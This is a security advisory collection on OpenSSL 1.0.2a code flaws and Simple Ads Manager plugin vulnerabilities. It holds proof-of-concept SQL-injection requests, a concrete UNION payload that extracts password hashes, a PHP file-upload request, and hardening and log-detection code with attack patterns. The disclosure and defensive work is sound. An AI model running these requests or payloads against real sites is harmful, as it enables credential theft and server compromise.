PoC 2 - Code Snippet [CWE 690]
========================
(.../openssl-1.0.2a/crypto/mem.c:386)

char *CRYPTO_strdup(const char *str, const char *file, int line)
{
    char *ret = CRYPTO_malloc(strlen(str) + 1, file, line);

    strcpy(ret, str);
    return ret;
}

Description: The function call does not make sure that ret is not NULL.


PoC 3 - Code Snippet [CWE 134]
========================
(.../openssl-1.0.2a/ssl/kssl.c:970)

    fprintf(stderr, (isprint(adata->contents[i])) ? "%c " : "%02x",
            adata->contents[i]);


Description: The function call is prone to a format string attack.


Appendices
==========
Sincere Thanks to the OpenSSL team for their mutual efforts.


Wordpress plugin Simple Ads Manager - SQL Injection

#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le () itas vn) & ITAS Team


::PROOF OF CONCEPT::

---SQL INJECTION 1---

+ REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3


- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:

case 'sam_ajax_sam_hits':
    if(isset($_POST['hits']) && is_array($_POST['hits'])) {
        $hits = $_POST['hits'];
        $values = '';
        $remoteAddr = $_SERVER['REMOTE_ADDR'];
        foreach($hits as $hit) {
            $values .= ((empty($values)) ? '' : ', ')
                . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
        }
        $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};";
        $result = $wpdb->query($sql);
        if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
        else echo json_encode(array(
            'success' => false,
            'result' => $result,
            'hits' => $hits,
            'sql' => $sql,
            'values' => $values
        ));
    }
    break;
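The query construction in the `sam_hits` handler, re-expressed two ways as an added example (not the plugin's code): `build_vulnerable` pastes `$hit[1]` and `$hit[0]` into the `VALUES` list exactly as the PHP above does, so whatever text arrives in the POST body becomes SQL; `build_safe` accepts only pairs of decimal integers and binds every value through placeholders. It runs against an in-memory SQLite table with a constructed schema (`NOW()` becomes `CURRENT_TIMESTAMP` because SQLite has no `NOW()`); function names are mine.

```python
"""The sam_hits INSERT built two ways: interpolated, as in the plugin, and parameterized."""
# Added example, not the plugin's code. The table is a constructed stand-in for
# the plugin's statistics table; the hit arrays mirror hits[N][] from the POST body.
import re
import sqlite3

SCHEMA = ("CREATE TABLE sam_stats (id INTEGER, pid INTEGER, event_time TEXT, "
          "event_type INTEGER, remote_addr TEXT)")
INSERT = "INSERT INTO sam_stats (id, pid, event_time, event_type, remote_addr) VALUES %s;"


def build_vulnerable(hits, remote_addr):
    """Mirror of the PHP: $hit[1] and $hit[0] are pasted into the VALUES list as-is."""
    values = ", ".join('(%s, %s, CURRENT_TIMESTAMP, 0, "%s")' % (hit[1], hit[0], remote_addr)
                       for hit in hits)
    return INSERT % values


def build_safe(hits, remote_addr):
    """Accept only pairs of decimal integers; bind every value through placeholders."""
    params = []
    for hit in hits:
        if len(hit) != 2 or not all(isinstance(v, str) and re.fullmatch(r"[0-9]+", v) for v in hit):
            raise ValueError("hit must be two non-negative integers, got %r" % (hit,))
        params.extend([int(hit[1]), int(hit[0]), remote_addr])
    if not params:
        raise ValueError("no hits")
    placeholders = ", ".join(["(?, ?, CURRENT_TIMESTAMP, 0, ?)"] * len(hits))
    return INSERT % placeholders, params


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def record_hits(conn, hits, remote_addr):
    """Store validated hits; returns the row count afterwards."""
    sql, params = build_safe(hits, remote_addr)
    conn.execute(sql, params)
    return conn.execute("SELECT COUNT(*) FROM sam_stats").fetchone()[0]


def is_rejected(hits):
    """True when build_safe refuses the input instead of turning it into SQL."""
    try:
        build_safe(hits, "203.0.113.9")
    except ValueError:
        return True
    return False
```

The vulnerable builder is never executed here; it exists to show that the raw request text lands inside the statement, which is the whole finding. In WordPress the same fix is `$wpdb->prepare()` with `%d` placeholders for the two ids and `%s` for the address.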




---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
    $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
    $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';
    $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';

    //set @row_num = 0;
    //SELECT @row_num := @row_num + 1 AS recid
    $sql = "SELECT
                wp.id,
                wp.post_title AS title,
                wp.post_type AS type
            FROM
                $postTable wp
            WHERE
                wp.post_status = 'publish' AND
                FIND_IN_SET(wp.post_type, 'post,page{$custs}')
            ORDER BY wp.id;";

    $posts = $wpdb->get_results($sql, ARRAY_A);

    $k = 0;
    foreach($posts as &$val) {
        switch($val['type']) {
            case 'post':
                $val['type'] = $sPost;
                break;
            case 'page':
                $val['type'] = $sPage;
                break;
            default:
                $val['type'] = $sPost . ': '.$val['type'];
                break;
        }
        $k++;
        $val['recid'] = $k;
    }
    $out = array(
        'status' => 'success',
        'total' => count($posts),
        'records' => $posts
    );
    break;



---SQL INJECTION 3---
+REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

action=load_combo_data

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
case 'sam_ajax_load_combo_data':
    $page = $_GET['page'];
    $rows = $_GET['rows'];
    $searchTerm = $_GET['searchTerm'];
    $offset = ((int)$page - 1) * (int)$rows;
    $sql = "SELECT
                wu.id,
                wu.display_name AS title,
                wu.user_nicename AS slug,
                wu.user_email AS email
            FROM
                $uTable wu
            WHERE wu.user_nicename LIKE '{$searchTerm}%'
            ORDER BY wu.id
            LIMIT $offset, $rows;";
    $users = $wpdb->get_results($sql, ARRAY_A);
    $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';";
    $rTotal = $wpdb->get_var($sql);
    $total = ceil((int)$rTotal/(int)$rows);
    $out = array(
        'page' => $page,
        'records' => count($users),
        'rows' => $users,
        'total' => $total,
        'offset' => $offset
    );
    break;




---SQL INJECTION 4---

+ REQUEST

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE>

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 188 to 223
case 'sam_ajax_load_users':
    $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';
    $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';
    $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';
    $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';
    $roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator';
    $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin';
    $sql = "SELECT
                wu.id,
                wu.display_name AS title,
                wu.user_nicename AS slug,
                (CASE wum.meta_value
                    WHEN 0 THEN '$roleSubscriber'
                    WHEN 1 THEN '$roleContributor'
                    WHEN 2 THEN '$roleAuthor'
                    ELSE
                        IF(wum.meta_value > 2 AND wum.meta_value <= 7,
                            '$roleEditor',
                            IF(wum.meta_value > 7 AND wum.meta_value <= 10,
                                '$roleAdministrator',
                                IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
                            )
                        )
                END) AS role
            FROM $uTable wu
            INNER JOIN $umTable wum
                ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
            ORDER BY wu.id;";
    $users = $wpdb->get_results($sql, ARRAY_A);
    $k = 0;
    foreach($users as &$val) {
        $k++;
        $val['recid'] = $k;
    }
    $out = $users;
    break;
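Both admin handlers above build their SQL by pasting request values into quoted string literals. The `load_combo_data` case (SQL INJECTION 3) is the easiest one to reason about, because `searchTerm` lands inside a LIKE pattern and the whole result set is returned to the caller; the `load_users` case is the same defect with the six role labels, and the fix is the same placeholders. The script below is an added example, written for this page rather than taken from ITAS or from the plugin. It reproduces that query shape against an in-memory SQLite table of constructed rows, shows a hypothetical `UNION_PAYLOAD` pulling `user_pass` through the endpoint, and shows the bound-parameter form that WordPress provides through `$wpdb->prepare()` together with `$wpdb->esc_like()`. The table contents, the payload string and the function names are all assumptions of the example; MySQL and SQLite differ in details such as comment handling, so the payload is illustrative rather than a drop-in.

```python
import sqlite3

# Constructed stand-in for wp_users; the password hashes are placeholders, not real data.
SAMPLE_USERS = [
    (1, "admin",  "adminuser", "Site Admin", "admin@example.com",  "$P$BplaceholderHash1"),
    (2, "editor", "editor",    "Ed Itor",    "editor@example.com", "$P$BplaceholderHash2"),
    (3, "bob",    "bob_smith", "Bob Smith",  "bob@example.com",    "$P$BplaceholderHash3"),
]

# Hypothetical searchTerm value: closes the LIKE literal, appends a UNION over wp_users
# with the same four-column shape as the original SELECT, and comments out the rest.
UNION_PAYLOAD = "x' UNION SELECT id, user_login, user_pass, user_email FROM wp_users -- "


def make_db():
    """In-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users (id INTEGER PRIMARY KEY, user_login TEXT, "
        "user_nicename TEXT, display_name TEXT, user_email TEXT, user_pass TEXT)"
    )
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def load_combo_data_vulnerable(conn, search_term, page="1", rows="10"):
    """Same query shape as the plugin's sam_ajax_load_combo_data case: the request
    values are pasted into the SQL text, so searchTerm can break out of the literal."""
    offset = (int(page) - 1) * int(rows)
    sql = (
        "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug, "
        "wu.user_email AS email FROM wp_users wu "
        f"WHERE wu.user_nicename LIKE '{search_term}%' "
        f"ORDER BY wu.id LIMIT {offset}, {rows};"
    )
    return conn.execute(sql).fetchall()


def escape_like(term, esc="\\"):
    """Counterpart of $wpdb->esc_like(): make %, _ and the escape character literal,
    so the caller cannot widen the pattern (binding alone does not prevent that)."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def load_combo_data_safe(conn, search_term, page="1", rows="10"):
    """Hardened form: the pattern and the paging values are bound parameters and the
    wildcards are escaped. In the plugin this is $wpdb->prepare() with %s/%d placeholders
    plus $wpdb->esc_like(); it does not replace the missing capability/nonce check."""
    rows_n = int(rows)
    offset = (int(page) - 1) * rows_n
    sql = (
        "SELECT wu.id, wu.display_name, wu.user_nicename, wu.user_email "
        "FROM wp_users wu WHERE wu.user_nicename LIKE ? ESCAPE '\\' "
        "ORDER BY wu.id LIMIT ? OFFSET ?"
    )
    return conn.execute(sql, (escape_like(search_term) + "%", rows_n, offset)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal:    ", load_combo_data_vulnerable(db, "adm"))
    print("injected:  ", load_combo_data_vulnerable(db, UNION_PAYLOAD))  # rows carry user_pass
    print("wildcard:  ", load_combo_data_vulnerable(db, "%"))            # every account
    print("safe:      ", load_combo_data_safe(db, UNION_PAYLOAD))        # []
    print("safe %:    ", load_combo_data_safe(db, "%"))                  # []
```

Two points the script makes that the advisory does not spell out. First, binding the pattern is not the whole fix: a bound but unescaped `searchTerm=%` still enumerates every account through the LIKE, which is what the `esc_like` step is for. Second, a correctly prepared query that any unauthenticated client can run is still the Information Disclosure reported further down this page; the capability and nonce check on `sam-ajax-admin.php` is a separate, equally necessary change.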




Best Regards
-----------------------------------
ITAS Team (www.itas.vn)

Wordpress plugin Simple Ads Manager - Information Disclosure

#Vulnerability title: Wordpress plugin Simple Ads Manager - Information
Disclosure
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2826
#Author: Nguyen Hung Tuan (tuan.h.nguyen () itas vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

action=load_users



+ Function list: load_users, load_authors, load_cats, load_tags, load_posts,
posts_debug, load_stats,...
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Image: http://www.itas.vn/uploads/newsother/disclosure.png

+ REFERENCE:
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en


Best regards
--------------------------------
ITAS Team (www.itas.vn)

Wordpress plugin Simple Ads Manager - Arbitrary File Upload

#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File
Upload
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.tran () itas vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026
Content-Length: 683

-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php

<?php phpinfo(); ?>
-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="action"

upload_ad_image
-----------------------------108989518220095255551617421026--


+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 303 to 314

case 'sam_ajax_upload_ad_image':
    if(isset($_POST['path'])) {
        $uploadDir = $_POST['path'];
        $file = $uploadDir . basename($_FILES['uploadfile']['name']);

        if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) {
            $out = array('status' => "success");
        } else {
            $out = array('status' => "error");
        }
    }
    break;
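Note what the handler does and does not check. It writes only when `$_POST['path']` is set, and then uses that value verbatim as the destination directory, so the client picks where the file lands; `basename()` strips directory components from the uploaded file's name but nothing looks at the extension or the content, and nobody is asked to prove they may upload. The Python below is an added example for this page (an editor's illustration, not the plugin's code or ITAS's) that models that logic next to a hardened version: an authorisation gate standing in for `check_ajax_referer()` plus `current_user_can('upload_files')`, a server-chosen directory, an extension allow-list confirmed against the file's magic bytes, and a random stored name. The `ALLOWED` table, the `is_authorised` flag, `PNG_STUB` and `run_demo()` are assumptions of the example.

```python
import os
import secrets
import tempfile

# Image types an ad manager needs; extension and leading bytes must both match.
ALLOWED = {
    ".png":  b"\x89PNG\r\n\x1a\n",
    ".gif":  b"GIF8",
    ".jpg":  b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}

PHP_POC = b"<?php phpinfo(); ?>"              # body of the advisory's info.php
PNG_STUB = ALLOWED[".png"] + b"\x00" * 16      # constructed bytes that pass the PNG check


def save_ad_image_vulnerable(upload_dir, filename, data):
    """Mirrors the plugin's sam_ajax_upload_ad_image case: the client supplies the
    directory ('path'), only basename() is applied to the file name, the content is
    never inspected and nobody is asked to prove they may upload."""
    os.makedirs(upload_dir, exist_ok=True)   # the real handler assumes the directory exists
    target = os.path.join(upload_dir, os.path.basename(filename))
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def save_ad_image_hardened(base_dir, filename, data, is_authorised):
    """What the handler should do instead. is_authorised stands in for WordPress's
    check_ajax_referer() plus current_user_can('upload_files'); the directory is chosen
    by the server, the extension must be on the allow-list and match the file's magic
    bytes, and the stored name is random so the client controls neither location nor name."""
    if not is_authorised:
        raise PermissionError("upload refused: caller is not authorised")
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:
        raise ValueError(f"upload refused: {ext!r} is not an allowed image extension")
    if not data.startswith(magic):
        raise ValueError(f"upload refused: content does not look like a {ext} image")
    os.makedirs(base_dir, exist_ok=True)
    target = os.path.join(base_dir, secrets.token_hex(16) + ext)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def run_demo():
    """Exercise both handlers on the advisory's info.php upload and on an image;
    returns a dict of outcomes so the result can be inspected or asserted on."""
    root = tempfile.mkdtemp()
    attacker_dir = os.path.join(root, "uploads")       # chosen by the client via 'path'
    server_dir = os.path.join(root, "ads")              # fixed by the server
    results = {}

    written = save_ad_image_vulnerable(attacker_dir, "info.php", PHP_POC)
    with open(written, "rb") as fh:
        results["vuln_wrote_php"] = written.endswith("info.php") and fh.read() == PHP_POC

    for key, name, data, auth, exc in (
        ("hardened_refused_php", "info.php", PHP_POC, True, ValueError),
        ("hardened_refused_fake_png", "info.png", PHP_POC, True, ValueError),   # renamed, wrong magic
        ("hardened_refused_anon", "ad.png", PNG_STUB, False, PermissionError),
    ):
        try:
            save_ad_image_hardened(server_dir, name, data, auth)
            results[key] = False
        except exc:
            results[key] = True

    stored = save_ad_image_hardened(server_dir, "../../ad.png", PNG_STUB, True)
    results["hardened_random_name"] = (
        os.path.dirname(stored) == server_dir
        and os.path.basename(stored) != "ad.png"
        and len(os.path.basename(stored)) == 32 + len(".png")
    )
    return results


if __name__ == "__main__":
    for key, ok in run_demo().items():
        print(f"{key:26} {'OK' if ok else 'FAIL'}")
```

The magic-byte check is deliberately paired with the extension allow-list and the fixed directory rather than used alone: a valid GIF with PHP appended still starts with `GIF8`, and what decides whether it executes is the extension the web server sees and whether PHP is enabled for the directory it sits in. The client-supplied `Content-Type: application/x-php` in the PoC is never consulted, because it is as attacker-controlled as the file name.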


+ REFERENCE:
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
- https://www.youtube.com/watch?v=8IU9EtUTkxI


Best regards
--------------------
ITAS Team (www.itas.vn)
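All three advisories on this page hinge on `sam-ajax-admin.php` answering requests sent straight to the plugin file. The script below is an added example, written for this page and not taken from ITAS or the plugin, of what can be recovered after the fact from ordinary web-server access logs: direct calls to the admin AJAX file that did not originate from a wp-admin page, SQL-looking content in the `searchTerm` query string, and PHP files being requested from under `wp-content/uploads/`. The lines in `SAMPLE_LOG` are constructed, and the regular expressions, rule names and the combined log format are the example's own assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx "combined" log format (assumed; adjust the pattern for other formats).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
SAM_ADMIN = "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
SAM_PUBLIC = "/wp-content/plugins/simple-ads-manager/sam-ajax.php"
SQLI_HINT = re.compile(r"'|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|--", re.I)
UPLOADS_PHP = re.compile(r"^/wp-content/uploads/.*\.ph(p\d?|tml|ar)$", re.I)

# Constructed sample lines: one direct probe, one searchTerm injection and one webshell
# fetch from 203.0.113.7, then two benign requests from 198.51.100.4.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Apr/2015:10:01:05 +0000] "POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Apr/2015:10:01:09 +0000] "POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=x%27+UNION+SELECT+1,2,3,4--+ HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Apr/2015:10:02:30 +0000] "GET /wp-content/uploads/info.php HTTP/1.1" 200 30455 "-" "Mozilla/5.0"
198.51.100.4 - - [02/Apr/2015:10:03:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 220 "http://example.com/wp-admin/" "Mozilla/5.0"
198.51.100.4 - - [02/Apr/2015:10:03:01 +0000] "GET /wp-content/uploads/2015/04/banner.png HTTP/1.1" 200 8122 "http://example.com/" "Mozilla/5.0"
"""


def analyse(log_text):
    """Return (rule, client_ip, request_target) tuples for every line matching a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        query = unquote_plus(url.query)
        referer_path = urlsplit(m["referer"]).path
        # 1. The admin AJAX file is only meant to be called from the plugin's wp-admin
        #    pages; a hit without such a referer is a direct, probably unauthenticated, call.
        if url.path == SAM_ADMIN and not referer_path.startswith("/wp-admin/"):
            findings.append(("direct-admin-ajax", m["ip"], m["target"]))
        # 2. searchTerm travels in the query string, so that injection is log-visible.
        if url.path in (SAM_ADMIN, SAM_PUBLIC) and SQLI_HINT.search(query):
            findings.append(("sqli-probe", m["ip"], m["target"]))
        # 3. PHP served from the uploads tree is the footprint of a successful
        #    upload_ad_image abuse (or of any other upload bug).
        if UPLOADS_PHP.match(url.path):
            findings.append(("uploads-php", m["ip"], m["target"]))
    return findings


if __name__ == "__main__":
    for rule, ip, target in analyse(SAMPLE_LOG):
        print(f"{rule:18} {ip:14} {target}")
```

Know the limits before relying on this. The POST bodies that carry `action`, the role labels, `cstr`, `hits` and the uploaded file itself are not written to access logs, so of the four injections only the `searchTerm` one is directly visible and the upload is visible only through its after-effects; the `direct-admin-ajax` rule is the catch-all for the rest, and the referer it keys on is client-supplied and can be forged. The apostrophe in `SQLI_HINT` will also fire on legitimate names, so treat that rule as a triage hint rather than a verdict.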

